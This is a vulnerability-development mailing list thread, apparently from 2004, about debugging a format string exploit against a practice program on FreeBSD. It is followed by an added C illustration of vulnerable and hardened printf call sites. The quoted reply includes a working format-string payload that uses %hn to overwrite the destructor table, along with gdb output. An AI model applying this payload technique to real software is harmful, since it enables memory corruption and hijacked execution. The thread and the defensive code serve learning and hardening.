Vulnerability Development mailing list archives
Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT
From: Ganbold <ganbold () micom mng net>
Date: Mon, 02 Aug 2004 11:37:54 +0900
Thank you for the quick answer. However, when I try to get EGG in gdb I get:

bash-2.05b$ uname -msr
FreeBSD 5.2-CURRENT i386
bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
08049828 d __DTOR_END__
bash-2.05b$ ./getenvaddr EGG
EGG is located at 0xbfbfe557
bash-2.05b$ gdb -q ./fmt_vuln
(no debugging symbols found)...
(gdb)
(gdb) x/1s 0xbfbfe557
0xbfbfe557:     <Address 0xbfbfe557 out of bounds>
(gdb)

What should I do in this case? Why does it say "Address out of bounds"?

Ganbold

At 09:24 AM 31.07.2004, you wrote:
-bash-2.05b$ uname -msr
FreeBSD 5.2.1-RC2 i386
-bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c
-bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
08049848 d __DTOR_END__
-bash-2.05b$ gdb -q ./fmt_vuln
(no debugging symbols found)...
(gdb)
(gdb) x/1s 0xbfbfedf5
0xbfbfedf5:     "EGG=vlad902"
(gdb) b * 0xbfbfedf9
Breakpoint 1 at 0xbfbfedf9
(gdb) run `perl -e 'print "\x4a\x98\x04\x08\xff\xff\xff\xff\xee\xee\xee\xee\x48\x98\x04\x08" . "%.49045u%.8x%.8x%.8x.%x%hn%x%.11826u%hn%x"'`
..
[*] test_val @ 0x0804979c = -72 0xffffffb8
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0xbfbfedf9 in ?? ()

> Can somebody give me some hints, advice and guides?

The only advice I can give you is to do it by hand rather than having tools do it for you. Although, while exploiting it, beware: I found the stack is very quirky, which is why I seem to have so many useless %x's lying around.

-vlad902
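The fmt_vuln program the thread is poking at is a stand-in for the bug class itself: untrusted input handed to a printf-family function as the format string. As an added illustration (not part of this thread and not the fmt_vuln.c source, which the archive does not show), the C below places a vulnerable call site next to its hardened form inside a hypothetical logging wrapper, log_msg, and includes a small check that tells the two apart without triggering undefined behaviour. All function names and the sample request line are constructed for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logging helper of the kind found in many daemons: the
 * caller supplies the format string, so the helper is only as safe as
 * its call sites. (Constructed for this example; not from the thread.) */
static int log_msg(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    int len;

    va_start(ap, fmt);
    len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Vulnerable call site: untrusted input becomes the format string, so
 * every %-directive it contains is interpreted by vsnprintf. */
int handle_unsafe(char *out, size_t n, const char *untrusted)
{
    return log_msg(out, n, untrusted);
}

/* Hardened call site: the format is a fixed literal and the untrusted
 * input is only ever an argument to it, never parsed for directives. */
int handle_safe(char *out, size_t n, const char *untrusted)
{
    return log_msg(out, n, "%s", untrusted);
}

/* Returns 1 when the handler interpreted directives in the input (the
 * logged text no longer matches the input byte for byte), 0 otherwise. */
int directives_interpreted(int (*handler)(char *, size_t, const char *),
                           const char *input)
{
    char out[256];

    handler(out, sizeof out, input);
    return strcmp(out, input) != 0;
}

int main(void)
{
    /* Constructed sample input: "%%" is the one directive that consumes
     * no argument, so it exercises the bug without undefined behaviour. */
    const char *probe = "GET /index.html%%";
    char out[256];

    handle_unsafe(out, sizeof out, probe);
    printf("unsafe : %s\n", out);   /* the %% collapses to a single % */
    handle_safe(out, sizeof out, probe);
    printf("safe   : %s\n", out);   /* input is logged verbatim */
    return 0;
}
```

The check uses "%%" deliberately: any other directive would make vsnprintf read arguments that were never passed, which is exactly the memory disclosure and write primitive the thread is exploiting and is undefined behaviour in a test. For finding such call sites at build time, giving log_msg the attribute `__attribute__((format(printf, 3, 4)))` lets gcc's -Wformat-security report the non-literal, argument-less call in handle_unsafe while leaving handle_safe silent.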